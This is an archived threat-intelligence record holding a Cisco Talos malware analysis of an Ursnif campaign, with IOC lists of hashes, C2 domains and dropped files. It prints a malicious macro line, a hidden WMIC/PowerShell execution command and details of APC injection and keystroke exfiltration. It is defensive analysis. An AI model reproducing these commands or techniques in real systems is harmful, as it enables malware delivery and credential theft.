{
	"id": "37790061-4446-4ab7-b214-ce9d09bb8f5a",
	"created_at": "2026-04-06T00:10:35.960209Z",
	"updated_at": "2026-04-10T03:20:45.106737Z",
	"deleted_at": null,
	"sha1_hash": "6dd0e8eec77b8535ef0376945b6b5d973e4dc4b0",
	"title": "Cisco AMP tracks new campaign that delivers Ursnif",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 710836,
	"plain_text": "Cisco AMP tracks new campaign that delivers Ursnif\r\nBy Cisco Talos\r\nPublished: 2019-01-24 · Archived: 2026-04-05 13:49:36 UTC\r\nThursday, January 24, 2019 13:39\r\nBy John Arneson.\r\nExecutive Summary\r\nCisco Talos once again spotted the Ursnif malware in the wild. We tracked this information stealer after Cisco's\r\nAdvanced Malware Protection (AMP) Exploit Prevention engine alerted us to these Ursnif infections. Thanks to\r\nAMP, we were able to prevent Ursnif from infecting any of its targets. The alert piqued our curiosity, so we began\r\nto dig a bit deeper and provide some recent IoCs related to this threat, which traditionally attempts to steal users'\r\nbanking login credentials and other login information. Talos has covered Ursnif in the past, as it is one of the most\r\npopular malware that attackers have deployed recently. In April, we detected that Ursnif was being delivered via\r\nmalicious emails along with the IceID banking trojan.\r\nMalicious Office document\r\nThe Ursnif sample from the alert comes from a Microsoft Word document containing a malicious VBA macro.\r\nThe document is straightforward, simply displaying an image that asks the user to enable macros. If macros are\r\nalready permitted, the macro is executed automatically when opening the document via the AutoOpen function.\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 1 of 9\n\nThe macro is mostly obfuscated code that executes math functions on data that does not relate to the next stage.\r\nThere is only one line in the macro that is important to executing the next stage, ultimately executing PowerShell.\r\nInteraction@.Shell RTrim(LTrim(Shapes(\"j6h1cf\").AlternativeText)), 84 * 2 + -168\r\nThis line accesses the AlternativeText property of the Shapes object \"j6h1cf.\" The value of this property is the\r\nmalicious PowerShell command, which is subsequently executed by the Shell function. The PowerShell command\r\nis base64 encoded, and is another PowerShell command that downloads Ursnif. Specifically, it downloads an\r\nexecutable from its C2 to the AppData directory and executes it. Note, this is where the Exploit Prevention engine\r\nstops executing the downloaded file and provides us with alerts to investigate.\r\nInfection\r\nAfter the Ursnif executable is downloaded and executed, registry data is created that is important for the next\r\nstage of execution.\r\nThe PowerShell command for the next stage of execution resides in the value of the APHohema key, as shown in\r\nthe image above.\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 2 of 9\n\nThis command uses Windows Management Instrumentation Command-line (WMIC) to execute PowerShell,\r\nwhich extracts the value of the Authicap key to execute it. The value of the Authicap key is a hexadecimal-encoded PowerShell command. The WMIC command makes use of /output:clipboard as a way to hide the normal\r\noutput of process creation that is printed when creating a process with WMIC.\r\nC:\\WINDOWS\\system32\\wbem\\wmic.exe /output:clipboard process call create \"powershell -w hidden\r\niex([System.Text.Encoding]::ASCII.GetString((get-itemproperty\r\n'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\236FF8AB-268A-4D1B-4807-BAD1FC2B8E95').Authicap))\"\r\nThe hexadecimal-encoded PowerShell command executed from Authicap decodes to a large PowerShell\r\ncommand, of which the most interesting part is base64-encoded. There are three parts to the command. The first\r\npart creates a function that is later used to decode base64 encoded PowerShell. The second part creates a byte\r\narray containing a malicious DLL. The third part executes the base64 decode function created in the first part,\r\nwith a base64 encoded string as the parameter to the function. The returned decoded PowerShell is subsequently\r\nexecuted by the shorthand Invoke-Expression (iex) function.\r\nThe decoded base64 PowerShell that is executed by iex is used to execute an Asynchronous Procedure Call (APC)\r\nInjection.\r\nThe first part of the command creates two variables that import kernel32.dll. In this case, the variables are\r\n$igaoctlsc and $gdopgtvl, as seen being established by the Add-Type cmdlet.\r\nThe APIs imported from kernel32 are:\r\nGetCurrentProcess\r\nVirtualAllocEx\r\nGetCurrentThreadID\r\nQueueUserAPC\r\nOpenThread\r\nSleepEx\r\nAfter the imports are established, the last portion is a single line that performs the APC Injection via the\r\nQueueUserAPC API. Here is the simplified form of that single line, with more readable formatting and\r\nnormalized variable names.\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 3 of 9\n\nThe injection starts by allocating memory for the malicious DLL with VirtualAllocEx, targeting the current\r\nprocess. If the allocation is successful, it then copies the malicious DLL into the newly allocated memory with\r\nCopy. Once that is completed, QueueUserAPC is executed, specifying the current thread within its process. This\r\ncreates a user-mode APC and queues it within the thread. To execute the malicious DLL from the APC queue, the\r\nthread needs to enter an alertable state. SleepEx is used to trigger an alertable state completing the APC injection,\r\nby specifying 1 (True) for its second parameter which is bAlertable.\r\nC2 Traffic\r\nAfter infection, the C2 requests are made over HTTPS. Intercepting the traffic, we are able to see the contents of\r\nthe requests. The most interesting part of the requests is that the data is put into a CAB file format, prior to\r\nexfiltration.\r\nURI Format Strings\r\nsoft=%u\u0026version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026crc=%x\r\nversion=%u\u0026soft=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026type=%u\u0026name=%s\r\n/data.php?version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026type=%u\u0026name=%s\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 4 of 9\n\ntype=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s\\\r\nUser-Agent Format String\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)\r\nThe CAB files containing the data to be exfiltrated are stored in %TEMP%, with the filename format being four\r\nhexadecimal characters and a .bin extension. As Ursnif logs data to be exfiltrated, it creates CAB files to store the\r\ndata with the built-in makecab.exe command. The command targets a created MakeCab directive file in the\r\n%TEMP% directory. The images below shows the created CAB files in %TEMP% and the MakeCab directives.\r\nInside the created CAB files are plaintext data in the format:\r\n\u003cCurrent Date and Time\u003e \u003cProcess Path\u003e \u003cWindow Text\u003e \u003cKeystrokes Logged\u003e\r\nConclusion\r\nTalos continues to monitor these threats as they evolve to ensure that defenses protect our customers. We strongly\r\nencourage users and organizations to follow recommended security practices, such as installing security patches as\r\nthey become available, exercising caution when receiving messages from unknown third parties, and ensuring that\r\na robust offline backup solution is in place. Ursnif uses CAB files to compress its data prior to exfiltration, so\r\nbeing aware of what challenges that will present will assist you in protecting and monitoring your environment. To\r\nhelp with the detection of this malware, we are providing readers with a list of IOCs below that can help you\r\nidentify and stop Ursnif before it infects your network.\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 5 of 9\n\nIndicators of Compromise (IOCS)\r\nHere are some recent IOCs from our tracking of Ursnif.\r\nMalicious documents:\r\ndb7f0dab70e1da8ef7a6a6d938531f2a6773c0c5f925f19874fd3e764aa45833\r\ne58827967cba544cc1db3d751095878115f4247982fb514bbd7b98bced8de6c0\r\n3846fe442df0175461081dd63299144a233debbd2453deeeb405126042ef72d1\r\n982cf7af71d0fe54cbdfac74fd2985c48a011e6ffffe65012ee4496bb669b321\r\ncbc10db9d7609e548e550e79f45940125895374b9a97e133020d5585bfd183ed\r\n2dbd942ac2f0b92d497fa6595f638cbddc24eab8beffb7cc648a91d65b45fa09\r\n38c459e56997e759ca680f88aae4428d9c76e9fae323b4d2238adf203036007c\r\n153c191ef4afd3eba9df89150ac728757efcba1293716c23f019e35270a388c4\r\n95f5f2ecdce872f5b96739f548e4b73bb8b7a2c11c46cfddf3e20fd04abfc091\r\n1cf5de71d51d2769079a8cb64e05f80e72e88846987602ad7302478c0d574caa\r\nc9f42b866fc203b4cd9d09cfcb0f8fca41097548393c15adb0557652526d818a\r\nba332017cbf16842170788f5688e3b8a79c821ef1331e428d77af238c379be4f\r\nb278b0e63acbbb92396da41bffb99b9ef09dff1b1b838f69e29245c6731269f7\r\nb6837f46124a360ffff235824cc1decda2b97d6daf73e80f3615bce7781a86aa\r\n12e3140656d7df63a1c444b0ebdae75039a18799e2ebd03a80eeb26ce5dbb66c\r\nd3383c7ee9704b51b302d7e611214a78050fcc7ad0969682355894af58f63cdf\r\n3eff10af3f2afbcf59d5cf77f470abe3cfafbe48255e7f6ea56a22608e332824\r\nad87dcc617e9914e28f76d071b586ac2cca9454078f3141c17e0102c9e2eebaa\r\n65f81148184a7ec71a43e9cd50e1267ab3fc64f3ef5f41f9da8bd74000baad30\r\nf7cc1b8f93831f7170e5317b5b79aaa9ceb2bc6724f21bc4e2c6cccb71655624\r\nd08e92af78cbf7049e8a9ca7b6ab61e8dc42729848e73b980b7cf5ac74d505af\r\n1b0b9cfaa78fac0875d10d087b8354d52bffb1f576eec7d49acab9d3394ccd9a\r\nd48f2cb5cc595f5cea29b7fd2bd8463fdfaf980c48792294ebb4c798516a7eae\r\n5a739f018675094baf0b61ff8462b1c946410f4776be877719cb20f9a9c16dfd\r\nd53ace589ad1a39487f36dd3e516ac2a5af0aec521f28c5b78b3a47636cfb068\r\n0778ef085fdebd39856ebfa4bf1203dcb7ee59fa4fc82a71a2ef3a949143c543\r\n4ffe626708fa6a2d76366a962359658e0d919544260aa2179727964c34e12080\r\n4dedf0b96b253b8fc15b007e4f61eb85d0345ef19f5a1fc6ea0772614375f606\r\nf3c7d7c0e71d15dc03614964c887a2459bd0ae4a97a324018a97dff27608e4b2\r\n8b73b12aad16a58d07048a307a7a558755d0f5ca369dbee8b808a9d9c941a25d\r\na2ae329bf70c24e4380d6133a4c02127e09597111e4edfd7808aa471450d2332\r\n001f52a0fa8d4abe34bfff6c96b423435c0ad3e06d40ece228fe2db3bc0d1067\r\nb4b56db2ce95d52b018edee05f996a1b5ae11a289979e984157a0efb7bbbc9b9\r\n617f1260e18929704c0ef45dae5eee7b9690b7a95f66e76ac00cf9dd2fca465b\r\nc283c26a991fd3599e8fd91bf059c2dbb07d3d630caf699531c48737faedc325\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 6 of 9\n\n447f249e60df0324f74a40a4b35f432b2e19f801ce2d4d6efa126a6841836b11\r\nd7aeacb2b12cef81315a64670a27575d84ac1af4541000d0093fdb3676afc515\r\nd200cbc2b28811bf4762d664a4b3f9f58f6b20af03981910dc2317751f91027d\r\nb409ee2691e7b2d2598cd01ac28a0914d4778da8d8b7a62d2f78492b14790917\r\ne95af1012346ab3edbb365f3463bd060bfa7f194b7c68c8e680dfbde43c57eb7\r\n015e2b8de525789f551abb4af169ad914f218fb07df2496c6f23d51d6a711688\r\nC2 Server Domains:\r\nlevocumbut[.]com\r\nrapworeepa[.]com\r\nwegatamata[.]com\r\nroevinguef[.]com\r\npivactubmi[.]com\r\nbiesbetiop[.]com\r\nnavectrece[.]com\r\nyancommato[.]com\r\ndewirasute[.]com\r\nptyptossen[.]com\r\nmochigokat[.]com\r\ntubpariang[.]com\r\nzardinglog[.]com\r\nabregeousn[.]com\r\naplatmesse[.]com\r\nabeelepach[.]com\r\nteomengura[.]com\r\nallooalel[.]club\r\nnublatoste[.]com\r\nledibermen[.]com\r\nlootototic[.]com\r\nacnessempo[.]com\r\nusteouraph[.]com\r\nizzlebutas[.]com\r\nsfernacrif[.]com\r\nisatawatag[.]com\r\nduenexacch[.]com\r\nkyllborena[.]com\r\nbawknogeni[.]com\r\nkicensinfa[.]com\r\nuvuladitur[.]com\r\nFiles Dropped\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 7 of 9\n\nNote, that filenames are hardcoded in the first PowerShell command executed, and vary by sample. This means\r\nthat these indicators aren't necessarily malicious on their own as filenames might collide with benign ones. If\r\nfound with other indicators, its likely a Ursnif infection.\r\n%AppData%/137d1dc1.exe\r\n%AppData%/1688e8b.exe\r\n%AppData%/1bdf65af.exe\r\n%AppData%/1cf8f7bb.exe\r\n%AppData%/2662438a.exe\r\n%AppData%/284ca7b3.exe\r\n%AppData%/31d073c1.exe\r\n%AppData%/3209f93c.exe\r\n%AppData%/3d4480c4.exe\r\n%AppData%/3fabbd27.exe\r\n%AppData%/40dc969c.exe\r\n%AppData%/4d46c42f.exe\r\n%AppData%/530ddba6.exe\r\n%AppData%/56ef205c.exe\r\n%AppData%/58b00f30.exe\r\n%AppData%/58f9603c.exe\r\n%AppData%/60404124.exe\r\n%AppData%/62574d8.exe\r\n%AppData%/6420f61f.exe\r\n%AppData%/6aad9e36.exe\r\n%AppData%/6ed4c1be.exe\r\n%AppData%/71bdcc14.exe\r\n%AppData%/75e1d341.exe\r\n%AppData%/7bc0a512.exe\r\n%AppData%/7df15b.exe\r\n%AppData%/8428791f.exe\r\n%AppData%/8c1d4ca.exe\r\n%AppData%/8d04e64a.exe\r\n%AppData%/97729da0.exe\r\n%AppData%/97979225.exe\r\n%AppData%/9835041d.exe\r\n%AppData%/9eb826ef.exe\r\n%AppData%/a54ab0bc.exe\r\n%AppData%/a9f1df84.exe\r\n%AppData%/aa5cc687.exe\r\n%AppData%/af74ae98.exe\r\n%AppData%/b034a4.exe\r\n%AppData%/bb5144e8.exe\r\n%AppData%/c1a17119.exe\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 8 of 9\n\n%AppData%/cbd42398.exe\r\n%AppData%/cf63b795.exe\r\n%AppData%/d5e1b91a.exe\r\n%AppData%/da0170a9.exe\r\n%AppData%/def4b6bf.exe\r\n%AppData%/e199be3d.exe\r\n%AppData%/e5920466.exe\r\n%AppData%/e7972c72.exe\r\n%AppData%/f005cb48.exe\r\n%AppData%/f0107edb.exe\r\n%AppData%/f2134754.exe\r\n%AppData%/fa408793.exe\r\nSource: https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nhttps://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html"
	],
	"report_names": [
		"amp-tracks-ursnif.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434235,
	"ts_updated_at": 1775791245,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6dd0e8eec77b8535ef0376945b6b5d973e4dc4b0.pdf",
		"text": "https://archive.orkl.eu/6dd0e8eec77b8535ef0376945b6b5d973e4dc4b0.txt",
		"img": "https://archive.orkl.eu/6dd0e8eec77b8535ef0376945b6b5d973e4dc4b0.jpg"
	}
}